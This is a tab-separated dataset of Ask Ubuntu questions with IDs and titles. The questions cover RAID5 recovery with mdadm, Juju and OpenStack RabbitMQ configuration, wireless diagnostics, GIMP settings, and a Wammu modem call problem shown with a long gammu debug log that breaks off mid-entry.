359783	ubuntu - can i use it or not	i am from india and i have heard and read about ubuntu . i am really sick of using microsoft products . i want ubuntu as a replacement . will it solve my needs . i have tried downloading ubuntu . but i am facing problem . i ca n't locate the exact webpage or link . i think there are many version of ubuntu . can someone help me in finding the link and also a step by step guide for installing it . i have some other doubts . will it have office applications and internet browsers in its bundle or i have to download it separately .
359787	when are the backports ppa for texlive back online again ?	in order to do what is suggested in http : //askubuntu.com/a/163683 the repositories have to actually work but i get a 404 when trying to install from them when are the backports ppa for texlive back online again ?
359788	recovering raid5 ( mdraid ) after clean os install ( ubuntu server 12.04 )	======== after having to reinstall the os i am having trouble accessing data stored on a raid5 group built on 8 hdds using mdraid . advice much appreciated ! i have a diy home nas server built on intel atom ( zotac nm10-dtx wifi ) , 8 x 2tb wd caviar hdds connected via a highpoint-rocketraid 2680 , as well as a 64gb ssd for the os . the setup was running fine for nearly 2 years ( on ubuntu server 10.4 lts ) and using mdraid ( it turned out i could get better performance using the raid adapter only for connecting the drives and using mdraid to build a 14tb raid5 array ) . i recently started to experience some performance issues ( reads and writes became slow - both when accessing the data from other hosts in my network and also running dd locally on the nas server ) so i decided to update the os at it 's been a while ( i only had automatic security updates ) . the update went horribly wrong with the os not even booting after the update - so i decided to make a clean install of ubuntu server 12.04 . thanks to askubuntu i managed to build the driver for the rocketraid 2680 and i can see all 8 drives ( /dev/sdb through /dev/sdi ) and running mdadm -- examine returns : /dev/sdb1 : magic : a92b4efc version : 0.90.00 uuid : e667bd7d : d55be409 : e9e4094c : aa5ad989 ( local to host wega ) creation time : wed jan 5 16:47:34 2011 raid level : raid5 used dev size : 1953431232 ( 1862.94 gib 2000.31 gb ) array size : 13674018624 ( 13040.56 gib 14002.20 gb ) raid devices : 8 total devices : 8 preferred minor : 0 update time : tue oct 15 18:36:41 2013 state : clean active devices : 8 working devices : 8 failed devices : 0 spare devices : 0 checksum : d1fdf40 - correct events : 1010 layout : left-symmetric chunk size : 64k number major minor raiddevice state 0 0 8 17 0 active sync /dev/sdb1 1 1 8 33 1 active sync /dev/sdc1 2 2 8 49 2 active sync /dev/sdd1 3 3 8 65 3 active sync /dev/sde1 4 4 8 81 4 active sync /dev/sdf1 5 5 8 97 5 active sync /dev/sdg1 6 6 8 113 6 active sync /dev/sdh1 7 7 8 129 7 active sync /dev/sdi1 i was also able to activate /ded/md0 by running : mdadm -- assemble /dev/md0 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1 /dev/sdf1 /dev/sdg1 /dev/sdh1 /dev/sdi1 ... returning : mdadm : /dev/md0 has been started with 8 drives . + now for the problem : + while the array appears to have restarted successfully , i do n't see my 14tb partition which i have created 2 years ago ( and used ever since to store all of my data ) . running cfdisk shows only a single linux partition with ~1.8tb of capacity and ~12tb of unused space : disk drive : /dev/md0 size : 14002195070976 bytes , 14002.1 gb heads : 2 sectors per track : 4 cylinders : 3418504656 name flags part type fs type [ label ] size ( mb ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- pri/log free space 0.06 md0p1 primary linux 1750274.33 pri/log free space 12251920.69 the same also appears when running mdadm -- detail /dev/md0 /dev/md0 : version : 0.90 creation time : wed jan 5 16:47:34 2011 raid level : raid5 array size : 13674018624 ( 13040.56 gib 14002.20 gb ) used dev size : 1953431232 ( 1862.94 gib 2000.31 gb ) raid devices : 8 total devices : 8 preferred minor : 0 persistence : superblock is persistent update time : wed oct 16 11:07:25 2013 state : clean active devices : 8 working devices : 8 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 64k uuid : e667bd7d : d55be409 : e9e4094c : aa5ad989 ( local to host wega ) events : 0.1010 number major minor raiddevice state 0 8 17 0 active sync /dev/sdb1 1 8 33 1 active sync /dev/sdc1 2 8 49 2 active sync /dev/sdd1 3 8 65 3 active sync /dev/sde1 4 8 81 4 active sync /dev/sdf1 5 8 97 5 active sync /dev/sdg1 6 8 113 6 active sync /dev/sdh1 7 8 129 7 active sync /dev/sdi1 if i understand correctly - the difference between `` array size '' and `` used device size '' ( 2tb vs 14tb ) means that there is a problem . i do not want to try to mount the partition until i understand what is going on ( to avoid any changes to the data which would inhibit be from getting again access to my raid group ) . any advice would be very much appreciated as i have been using this nas server for all backups and digital media . did i forget to flip one last switch or am i totally screwed ?
359789	juju did n't configure rabbitmq for openstack ?	i have installed ubuntu openstack ha with juju with all 24 servers . but my openstack is not working at all . on dashboard on every page i get errors saying `` could not retrieve usage information '' , `` could not retrieve volume information , `` could not retrieve ... ..etc i spent hours and have discovered that juju has not done configuration correctly . i found that on cloud controller in nova.conf juju has added rabitmq vhost enrty , but that virtual host is not added in rabbitmq . then how is its suppose to work ? and on juju-gui canvas rabbimq is all green and is working fine , which in reality its not . i am really wondering if juju has really done correct configuration in all 24 servers now , i am getting the feeling that it would have been faster if i would have done openstack deployment manually instead of using juju . why was the virtual host entry not added in rabbitmq ? how should i solve this ?
359791	install windows 7 on a usb drive using ubuntu 12.04	i am running ubuntu 12.04 and i would like to install windows 7 home premium on an external ssd . i found some tools and a guide which i successfully ran on a windows machine . this waik tools include a file called installer.cmd that runs windows commands and assumes that you have a windows file tree like \system32 , which do not work on my ubuntu installation . i did try running it with wine but with no luck . is there a way to install windows 7 on a external drive while running ubuntu ?
359793	how to move specific files while preserving their directory structure	i have large directory with lots of files and directories on a remote windows system where i only have ftp access . i had to do some modifications in some of the files , so i downloaded the whole directory to run a find and replace command in files recursively . using git locally , i was able to get the list of modified files . ( their is no git on the windows system , so i ca n't push/pull . besides , i only have ftp access . ) now i need to update the files on the windows system . uploading file by file manually can be frustrating as there are a lot of modified files . some of the files are located in subdirectories and sub-subdirectories . for example this structure ( there are a lot more files ) : ./ | -- - file1 | -- - file2 | -- - dir1 | | -- - file1.1 | | -- - dir1.1 | | -- -- file1.1.1 | -- - dir2 | -- - file2.1 | -- - file2.2 | -- - file2.3 how can i copy them ( or moving them is even fine ) to a new location , while preserving their directory structure . this way , in my ftp client , i would just move the whole folder . it will manage the directory structure by itself . keep in mind , that the subdirectories have other unmodified files in them , which i do not want to be copied . git gave me this list , so it did half the work : file1 file2 dir1/file1.1 dir1/dir1.1/file1.1.1 dir2/file2.1 dir2/file2.2 dir2/file2.3
359794	how to limit max width of gimp edit window when loading image for edit ?	opening an image in gimp for editing brings up three separate windows , two side panels that open left and right of center to hold the toolbox and other settings , and the image to be edited in the center . it would be ideal to have the window containing the image open so that its borders fit between the side panels in the available screen space . the gimp tries to do this by zooming the image to a percentage of full scale . oftentimes i find that the window 's right edge , with the scroll bar , is behind the right side panel . my work-around is to zoom the image out to where it is in full view , then shrink-wrap the edit window 's borders to fit the image ( view menu ) . i can then zoom in on the image and scroll horizontally and vertically to see the part up-close that i need to work on . i just recently went to a wide screen monitor , so i have more space in the middle , and moved the right panel to the far right . the edit window still hides behind the right panel . just as there is a setting to select which tool i open up with by default , i should be able to set the maximum width of this window . right now i am using ubuntu 10.04 , since the computer with 12.04 had a hard drive starting to fail . i am enjoying some of the features of this version , for i have a black , large mouse pointer and was able to configure more color preferences in my theme . it also will suspend magnificently when i let the computer go to sleep . but back to my question , is there a setting i should look for in the gimp to limit the screen space the image window can open into ?
359798	dell recovery utility on xps 13	i am trying to set up a os recovery media using the dell recovery utility ( ie command 'dell-recovery ' ) on a brand new dell xps13 with v12.04 lts . once the usb key is loaded with the image etc , i am not able to read the usb memory stick ! is this as expected ? the error is : unable to mount 16 gb filesystem error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so i tried to preformat or format during the process and it made no difference . also , to test the memory stick i assume i can just try to boot from it , although how does one know if it has actually booted from the memory stick and not the hard disk ? ( maybe if i ca n't tell then maybe it has not happened ? : ) ) thanks in advance n
359803	i have n't wireless service in ubuntu 12.04	my wireless is desabled in ubuntu and i ca n't to connect to wireless vahid @ kharazi : ~ $ rfkill list all 1 : sony-wifi : wireless lan soft blocked : no hard blocked : no 2 : sony-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : phy0 : wireless lan soft blocked : no hard blocked : no iwconfig br0 no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on lo no wireless extensions . eth0 no wireless extensions . ifconfig -a br0 link encap : ethernet hwaddr 54:42:49:01:45:32 inet addr:192.168.1.6 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5642:49ff : fe01:4532/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7271 errors:0 dropped:0 overruns:0 frame:0 tx packets:8226 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5543099 ( 5.5 mb ) tx bytes:1327122 ( 1.3 mb ) eth0 link encap : ethernet hwaddr 54:42:49:01:45:32 up broadcast running multicast mtu:1500 metric:1 rx packets:7281 errors:0 dropped:0 overruns:0 frame:0 tx packets:8222 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5649770 ( 5.6 mb ) tx bytes:1326537 ( 1.3 mb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1687 errors:0 dropped:0 overruns:0 frame:0 tx packets:1687 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:629901 ( 629.9 kb ) tx bytes:629901 ( 629.9 kb ) wlan0 link encap : ethernet hwaddr 2c:81:58 : ff:37:56 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
359807	music player with random folder playback	can annyone suggest any music player which allow shuffle random folder , not artist or track ? for example foobar2000 has this feature in playback - order - shuffle ( folder ) .
359809	no sounds in call with wammu	i am in ubuntu 13.04 amd64 system . i installed wammu with gammu . when i am trying to call with wammu , through huawei e169 3g usb modem , there is no sounds in wammu ( dial tone or call sounds ) . but rings are going on in the remote connection . it also does n't get sounds from incomming ( from computer ) . i was able to get calls from this device with the application , mobile parner previously in windows . so it supports calls . this also not works with mobile partner in ubuntu . i asked this question also : way to call through dongle in ubuntu 13.04 there is log report . tue 2013/10/15 09:55:46 : [ gammu - 1.33.0 built 15:30:05 jul 12 2013 using gcc 4.7 ] tue 2013/10/15 09:55:46 : [ connection - `` at19200 '' ] tue 2013/10/15 09:55:46 : [ connection index - 0 ] tue 2013/10/15 09:55:46 : [ model type - `` '' ] tue 2013/10/15 09:55:46 : [ device - `` /dev/ttyusb0 '' ] tue 2013/10/15 09:55:46 : [ running on - linux , kernel 3.8.0-31-generic ( # 46-ubuntu smp tue sep 10 20:03:44 utc 2013 ) ] tue 2013/10/15 09:55:46 : serial device : dtr is up , rts is up , car is up , cts is up tue 2013/10/15 09:55:46 : setting speed to 19200 tue 2013/10/15 09:55:46 : [ module - `` auto '' ] tue 2013/10/15 09:55:46 : escaping sms mode tue 2013/10/15 09:55:46 : sending frametype 0x00/length 0x02/2 tue 2013/10/15 09:55:46 : 1b |0d .. tue 2013/10/15 09:55:46 : sending simple at command to wake up some devices tue 2013/10/15 09:55:46 : sending frametype 0x00/length 0x03/3 tue 2013/10/15 09:55:46 : 41a|54t|0d at . tue 2013/10/15 09:55:47 : 1 `` at '' tue 2013/10/15 09:55:47 : 2 `` ok '' tue 2013/10/15 09:55:47 : checking line : ok tue 2013/10/15 09:55:47 : at reply state : 1 tue 2013/10/15 09:55:47 : received frametype 0x00/length 0x09/9 tue 2013/10/15 09:55:47 : 41a|54t|0d |0d |0a |4fo|4bk|0d |0a at ... ok.. tue 2013/10/15 09:55:48 : enabling echo tue 2013/10/15 09:55:48 : sending frametype 0x00/length 0x05/5 tue 2013/10/15 09:55:48 : 41a|54t|45e|311|0d ate1 . tue 2013/10/15 09:55:48 : 1 `` ate1 '' tue 2013/10/15 09:55:48 : 2 `` ok '' tue 2013/10/15 09:55:48 : checking line : ok tue 2013/10/15 09:55:48 : at reply state : 1 tue 2013/10/15 09:55:48 : received frametype 0x00/length 0x0b/11 tue 2013/10/15 09:55:48 : 41a|54t|45e|311|0d |0d |0a |4fo|4bk|0d |0a ate1 ... ok.. tue 2013/10/15 09:55:48 : trying motorola mode switch tue 2013/10/15 09:55:48 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:55:48 : 41a|54t|2b+|4dm|4fo|44d|45e|3d=|322|0d at+mode=2 . tue 2013/10/15 09:55:48 : 1 `` at+mode=2 '' tue 2013/10/15 09:55:48 : 2 `` command not support '' tue 2013/10/15 09:55:48 : checking line : command not support tue 2013/10/15 09:55:48 : at reply state : 3 tue 2013/10/15 09:55:48 : received frametype 0x00/length 0x21/33 tue 2013/10/15 09:55:48 : 41a|54t|2b+|4dm|4fo|44d|45e|3d=|322|0d |0d |0a |43c|4fo|4dm|4dm at+mode=2 ... comm tue 2013/10/15 09:55:48 : 41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo|52r|54t|0d and not support . tue 2013/10/15 09:55:48 : 0a . tue 2013/10/15 09:55:48 : seems not to be supported tue 2013/10/15 09:55:48 : enabling cme errors tue 2013/10/15 09:55:48 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:55:48 : 41a|54t|2b+|43c|4dm|45e|45e|3d=|311|0d at+cmee=1 . tue 2013/10/15 09:55:49 : 1 `` at+cmee=1 '' tue 2013/10/15 09:55:49 : 2 `` ok '' tue 2013/10/15 09:55:49 : checking line : ok tue 2013/10/15 09:55:49 : at reply state : 1 tue 2013/10/15 09:55:49 : received frametype 0x00/length 0x10/16 tue 2013/10/15 09:55:49 : 41a|54t|2b+|43c|4dm|45e|45e|3d=|311|0d |0d |0a |4fo|4bk|0d |0a at+cmee=1 ... ok.. tue 2013/10/15 09:55:49 : sending frametype 0x00/length 0x09/9 tue 2013/10/15 09:55:49 : 41a|54t|2b+|43c|53s|43c|53s|3f ? |0d at+cscs ? . tue 2013/10/15 09:55:49 : 1 `` at+cscs ? '' tue 2013/10/15 09:55:49 : 2 `` +cscs : `` ucs2 '' '' tue 2013/10/15 09:55:49 : 3 `` ok '' tue 2013/10/15 09:55:49 : checking line : ok tue 2013/10/15 09:55:49 : at reply state : 1 tue 2013/10/15 09:55:49 : received frametype 0x00/length 0x20/32 tue 2013/10/15 09:55:49 : 41a|54t|2b+|43c|53s|43c|53s|3f ? |0d |0d |0a |2b+|43c|53s|43c|53s at+cscs ? ... +cscs tue 2013/10/15 09:55:49 : 3a : |20 |22 '' |55u|43c|53s|322|22 '' |0d |0a |0d |0a |4fo|4bk|0d |0a : `` ucs2 '' ... .ok.. tue 2013/10/15 09:55:49 : sending frametype 0x00/length 0x08/8 tue 2013/10/15 09:55:49 : 41a|54t|2b+|43c|47g|4dm|49i|0d at+cgmi . tue 2013/10/15 09:55:50 : 1 `` at+cgmi '' tue 2013/10/15 09:55:50 : 2 `` huawei '' tue 2013/10/15 09:55:50 : 3 `` ok '' tue 2013/10/15 09:55:50 : checking line : ok tue 2013/10/15 09:55:50 : at reply state : 1 tue 2013/10/15 09:55:50 : received frametype 0x00/length 0x18/24 tue 2013/10/15 09:55:50 : 41a|54t|2b+|43c|47g|4dm|49i|0d |0d |0a |68h|75u|61a|77w|65e|69i at+cgmi ... huawei tue 2013/10/15 09:55:50 : 0d |0a |0d |0a |4fo|4bk|0d |0a ... .ok.. tue 2013/10/15 09:55:50 : manufacturer info received tue 2013/10/15 09:55:50 : [ manufacturer : huawei ] tue 2013/10/15 09:55:50 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:55:50 : 41a|54t|2b+|43c|53s|43c|53s|3d=|3f ? |0d at+cscs= ? . tue 2013/10/15 09:55:50 : 1 `` at+cscs= ? '' tue 2013/10/15 09:55:50 : 2 `` +cscs : ( `` ira '' , '' gsm '' , '' ucs2 '' ) '' tue 2013/10/15 09:55:50 : 3 `` ok '' tue 2013/10/15 09:55:50 : checking line : ok tue 2013/10/15 09:55:50 : at reply state : 1 tue 2013/10/15 09:55:50 : received frametype 0x00/length 0x2f/47 tue 2013/10/15 09:55:50 : 41a|54t|2b+|43c|53s|43c|53s|3d=|3f ? |0d |0d |0a |2b+|43c|53s|43c at+cscs= ? ... +csc tue 2013/10/15 09:55:50 : 53s|3a : |20 |28 ( |22 '' |49i|52r|41a|22 '' |2c , |22 '' |47g|53s|4dm|22 '' |2c , s : ( `` ira '' , '' gsm '' , tue 2013/10/15 09:55:50 : 22 '' |55u|43c|53s|322|22 '' |29 ) |0d |0a |0d |0a |4fo|4bk|0d |0a `` ucs2 '' ) ... .ok.. tue 2013/10/15 09:55:50 : chosen gsm as normal charset tue 2013/10/15 09:55:50 : chosen ucs2 as unicode charset tue 2013/10/15 09:55:50 : sending frametype 0x00/length 0x0e/14 tue 2013/10/15 09:55:50 : 41a|54t|2b+|43c|53s|43c|53s|3d=|22 '' |47g|53s|4dm|22 '' |0d at+cscs= '' gsm '' . tue 2013/10/15 09:55:50 : 1 `` at+cscs= '' gsm '' '' tue 2013/10/15 09:55:50 : 2 `` ok '' tue 2013/10/15 09:55:50 : checking line : ok tue 2013/10/15 09:55:50 : at reply state : 1 tue 2013/10/15 09:55:50 : received frametype 0x00/length 0x14/20 tue 2013/10/15 09:55:50 : 41a|54t|2b+|43c|53s|43c|53s|3d=|22 '' |47g|53s|4dm|22 '' |0d |0d |0a at+cscs= '' gsm '' ... tue 2013/10/15 09:55:50 : 4fo|4bk|0d |0a ok.. tue 2013/10/15 09:55:50 : sending frametype 0x00/length 0x09/9 tue 2013/10/15 09:55:50 : 41a|54t|2b+|43c|53s|43c|53s|3f ? |0d at+cscs ? . tue 2013/10/15 09:55:51 : 1 `` at+cscs ? '' tue 2013/10/15 09:55:51 : 2 `` +cscs : `` gsm '' '' tue 2013/10/15 09:55:51 : 3 `` ok '' tue 2013/10/15 09:55:51 : checking line : ok tue 2013/10/15 09:55:51 : at reply state : 1 tue 2013/10/15 09:55:51 : received frametype 0x00/length 0x1f/31 tue 2013/10/15 09:55:51 : 41a|54t|2b+|43c|53s|43c|53s|3f ? |0d |0d |0a |2b+|43c|53s|43c|53s at+cscs ? ... +cscs tue 2013/10/15 09:55:51 : 3a : |20 |22 '' |47g|53s|4dm|22 '' |0d |0a |0d |0a |4fo|4bk|0d |0a : `` gsm '' ... .ok.. tue 2013/10/15 09:55:51 : getting model tue 2013/10/15 09:55:51 : sending frametype 0x00/length 0x08/8 tue 2013/10/15 09:55:51 : 41a|54t|2b+|43c|47g|4dm|4dm|0d at+cgmm . tue 2013/10/15 09:55:51 : 1 `` at+cgmm '' tue 2013/10/15 09:55:51 : 2 `` e169 '' tue 2013/10/15 09:55:51 : 3 `` ok '' tue 2013/10/15 09:55:51 : checking line : ok tue 2013/10/15 09:55:51 : at reply state : 1 tue 2013/10/15 09:55:51 : received frametype 0x00/length 0x16/22 tue 2013/10/15 09:55:51 : 41a|54t|2b+|43c|47g|4dm|4dm|0d |0d |0a |45e|311|366|399|0d |0a at+cgmm ... e169.. tue 2013/10/15 09:55:51 : 0d |0a |4fo|4bk|0d |0a ..ok.. tue 2013/10/15 09:55:51 : [ model name : `e169 ' ] tue 2013/10/15 09:55:51 : [ model data : `e169 ' ] tue 2013/10/15 09:55:51 : [ model data : `e169 ' ] tue 2013/10/15 09:55:51 : [ connected model - `` e169 '' ] tue 2013/10/15 09:55:51 : checking for obex support tue 2013/10/15 09:55:51 : sending frametype 0x00/length 0x0b/11 tue 2013/10/15 09:55:51 : 41a|54t|2b+|43c|50p|52r|4fo|54t|3d=|3f ? |0d at+cprot= ? . tue 2013/10/15 09:55:51 : 1 `` at+cprot= ? '' tue 2013/10/15 09:55:51 : 2 `` command not support '' tue 2013/10/15 09:55:51 : checking line : command not support tue 2013/10/15 09:55:51 : at reply state : 3 tue 2013/10/15 09:55:51 : received frametype 0x00/length 0x22/34 tue 2013/10/15 09:55:51 : 41a|54t|2b+|43c|50p|52r|4fo|54t|3d=|3f ? |0d |0d |0a |43c|4fo|4dm at+cprot= ? ... com tue 2013/10/15 09:55:51 : 4dm|41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo|52r|54t mand not support tue 2013/10/15 09:55:51 : 0d |0a .. tue 2013/10/15 09:55:51 : checking for syncml/obex support tue 2013/10/15 09:55:51 : sending frametype 0x00/length 0x0c/12 tue 2013/10/15 09:55:51 : 41a|54t|2b+|53s|59y|4en|43c|4dm|4cl|3d=|3f ? |0d at+syncml= ? . tue 2013/10/15 09:55:51 : 1 `` at+syncml= ? '' tue 2013/10/15 09:55:51 : 2 `` command not support '' tue 2013/10/15 09:55:51 : checking line : command not support tue 2013/10/15 09:55:51 : at reply state : 3 tue 2013/10/15 09:55:51 : received frametype 0x00/length 0x23/35 tue 2013/10/15 09:55:51 : 41a|54t|2b+|53s|59y|4en|43c|4dm|4cl|3d=|3f ? |0d |0d |0a |43c|4fo at+syncml= ? ... co tue 2013/10/15 09:55:51 : 4dm|4dm|41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo|52r mmand not suppor tue 2013/10/15 09:55:51 : 54t|0d |0a t.. tue 2013/10/15 09:55:51 : checking for syncml/obex support tue 2013/10/15 09:55:51 : sending frametype 0x00/length 0x0d/13 tue 2013/10/15 09:55:51 : 41a|54t|24 $ |54t|53s|53s|50p|43c|53s|57w|3d=|3f ? |0d at $ tsspcsw= ? . tue 2013/10/15 09:55:51 : 1 `` at $ tsspcsw= ? '' tue 2013/10/15 09:55:51 : 2 `` command not support '' tue 2013/10/15 09:55:51 : checking line : command not support tue 2013/10/15 09:55:51 : at reply state : 3 tue 2013/10/15 09:55:51 : received frametype 0x00/length 0x24/36 tue 2013/10/15 09:55:51 : 41a|54t|24 $ |54t|53s|53s|50p|43c|53s|57w|3d=|3f ? |0d |0d |0a |43c at $ tsspcsw= ? ... c tue 2013/10/15 09:55:51 : 4fo|4dm|4dm|41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo ommand not suppo tue 2013/10/15 09:55:51 : 52r|54t|0d |0a rt.. tue 2013/10/15 09:55:51 : [ module - `` a2d|ipaq|at|m20|s25|mc35|tc35|c35i|s65|s300|5110|5130|5190|5210|6110|6130|6150|6190|6210|6250|6310|6310i|6510|7110|8210|8250|8290|8310|8390|8850|8855|8890|8910|9110|9210 '' ] tue 2013/10/15 09:55:51 : escaping sms mode tue 2013/10/15 09:55:51 : sending frametype 0x00/length 0x02/2 tue 2013/10/15 09:55:51 : 1b |0d .. tue 2013/10/15 09:55:51 : sending simple at command to wake up some devices tue 2013/10/15 09:55:51 : sending frametype 0x00/length 0x03/3 tue 2013/10/15 09:56:04 : 4bk|0d |0a k.. tue 2013/10/15 09:56:04 : checking availability of sbnr tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:56:04 : 41a|54t|5e^|53s|42b|4en|52r|3d=|3f ? |0d at^sbnr= ? . tue 2013/10/15 09:56:04 : 1 `` at^sbnr= ? '' tue 2013/10/15 09:56:04 : 2 `` command not support '' tue 2013/10/15 09:56:04 : checking line : command not support tue 2013/10/15 09:56:04 : at reply state : 3 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x21/33 tue 2013/10/15 09:56:04 : 41a|54t|5e^|53s|42b|4en|52r|3d=|3f ? |0d |0d |0a |43c|4fo|4dm|4dm at^sbnr= ? ... comm tue 2013/10/15 09:56:04 : 41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo|52r|54t|0d and not support . tue 2013/10/15 09:56:04 : 0a . tue 2013/10/15 09:56:04 : checking availability of spbr tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:56:04 : 41a|54t|2b+|53s|50p|42b|52r|3d=|3f ? |0d at+spbr= ? . tue 2013/10/15 09:56:04 : 1 `` at+spbr= ? '' tue 2013/10/15 09:56:04 : 2 `` command not support '' tue 2013/10/15 09:56:04 : checking line : command not support tue 2013/10/15 09:56:04 : at reply state : 3 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x21/33 tue 2013/10/15 09:56:04 : 41a|54t|2b+|53s|50p|42b|52r|3d=|3f ? |0d |0d |0a |43c|4fo|4dm|4dm at+spbr= ? ... comm tue 2013/10/15 09:56:04 : 41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo|52r|54t|0d and not support . tue 2013/10/15 09:56:04 : 0a . tue 2013/10/15 09:56:04 : checking availability of mpbr tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:56:04 : 41a|54t|2b+|4dm|50p|42b|52r|3d=|3f ? |0d at+mpbr= ? . tue 2013/10/15 09:56:04 : 1 `` at+mpbr= ? '' tue 2013/10/15 09:56:04 : 2 `` command not support '' tue 2013/10/15 09:56:04 : checking line : command not support tue 2013/10/15 09:56:04 : at reply state : 3 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x21/33 tue 2013/10/15 09:56:04 : 41a|54t|2b+|4dm|50p|42b|52r|3d=|3f ? |0d |0d |0a |43c|4fo|4dm|4dm at+mpbr= ? ... comm tue 2013/10/15 09:56:04 : 41a|4en|44d|20 |4en|4fo|54t|20 |53s|55u|50p|50p|4fo|52r|54t|0d and not support . tue 2013/10/15 09:56:04 : 0a . tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x0f/15 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|53s|43c|53s|3d=|22 '' |55u|43c|53s|322|22 '' |0d at+cscs= '' ucs2 '' . tue 2013/10/15 09:56:04 : 1 `` at+cscs= '' ucs2 '' '' tue 2013/10/15 09:56:04 : 2 `` ok '' tue 2013/10/15 09:56:04 : checking line : ok tue 2013/10/15 09:56:04 : at reply state : 1 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x15/21 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|53s|43c|53s|3d=|22 '' |55u|43c|53s|322|22 '' |0d |0d at+cscs= '' ucs2 '' .. tue 2013/10/15 09:56:04 : 0a |4fo|4bk|0d |0a .ok.. tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x09/9 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|53s|43c|53s|3f ? |0d at+cscs ? . tue 2013/10/15 09:56:04 : 1 `` at+cscs ? '' tue 2013/10/15 09:56:04 : 2 `` +cscs : `` ucs2 '' '' tue 2013/10/15 09:56:04 : 3 `` ok '' tue 2013/10/15 09:56:04 : checking line : ok tue 2013/10/15 09:56:04 : at reply state : 1 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x20/32 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|53s|43c|53s|3f ? |0d |0d |0a |2b+|43c|53s|43c|53s at+cscs ? ... +cscs tue 2013/10/15 09:56:04 : 3a : |20 |22 '' |55u|43c|53s|322|22 '' |0d |0a |0d |0a |4fo|4bk|0d |0a : `` ucs2 '' ... .ok.. tue 2013/10/15 09:56:04 : getting memory status tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x09/9 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|50p|42b|53s|3f ? |0d at+cpbs ? . tue 2013/10/15 09:56:04 : 1 `` at+cpbs ? '' tue 2013/10/15 09:56:04 : 2 `` +cpbs : `` me '' ,0,100 '' tue 2013/10/15 09:56:04 : 3 `` ok '' tue 2013/10/15 09:56:04 : checking line : ok tue 2013/10/15 09:56:04 : at reply state : 1 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x24/36 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|50p|42b|53s|3f ? |0d |0d |0a |2b+|43c|50p|42b|53s at+cpbs ? ... +cpbs tue 2013/10/15 09:56:04 : 3a : |20 |22 '' |4dm|45e|22 '' |2c , |300|2c , |311|300|300|0d |0a |0d |0a : `` me '' ,0,100 ... . tue 2013/10/15 09:56:04 : 4fo|4bk|0d |0a ok.. tue 2013/10/15 09:56:04 : memory status received tue 2013/10/15 09:56:04 : parsing +cpbs : `` me '' ,0,100 with +cpbs : @ s , @ i , @ i tue 2013/10/15 09:56:04 : grabbed string from reply : `` me '' ( parsed 4 bytes ) tue 2013/10/15 09:56:04 : parsed generic string `` me '' tue 2013/10/15 09:56:04 : generic string decoded as `` me '' tue 2013/10/15 09:56:04 : parsed int 0 tue 2013/10/15 09:56:04 : parsed int 100 tue 2013/10/15 09:56:04 : getting memory information tue 2013/10/15 09:56:04 : sending frametype 0x00/length 0x0a/10 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|50p|42b|52r|3d=|3f ? |0d at+cpbr= ? . tue 2013/10/15 09:56:04 : 1 `` at+cpbr= ? '' tue 2013/10/15 09:56:04 : 2 `` +cpbr : ( 1-100 ) ,24,255 '' tue 2013/10/15 09:56:04 : 3 `` ok '' tue 2013/10/15 09:56:04 : checking line : ok tue 2013/10/15 09:56:04 : at reply state : 1 tue 2013/10/15 09:56:04 : received frametype 0x00/length 0x29/41 tue 2013/10/15 09:56:04 : 41a|54t|2b+|43c|50p|42b|52r|3d=|3f ? |0d |0d |0a |2b+|43c|50p|42b at+cpbr= ? ... +cpb tue 2013/10/15 09:56:04 : 52r|3a : |20 |28 ( |311|2d-|311|300|300|29 ) |2c , |322|344|2c , |322|355 r : ( 1-100 ) ,24,25 tue 2013/10/15 09:56:04 : 355|0d |0a |0d |0a |4fo|4bk|0d |0a 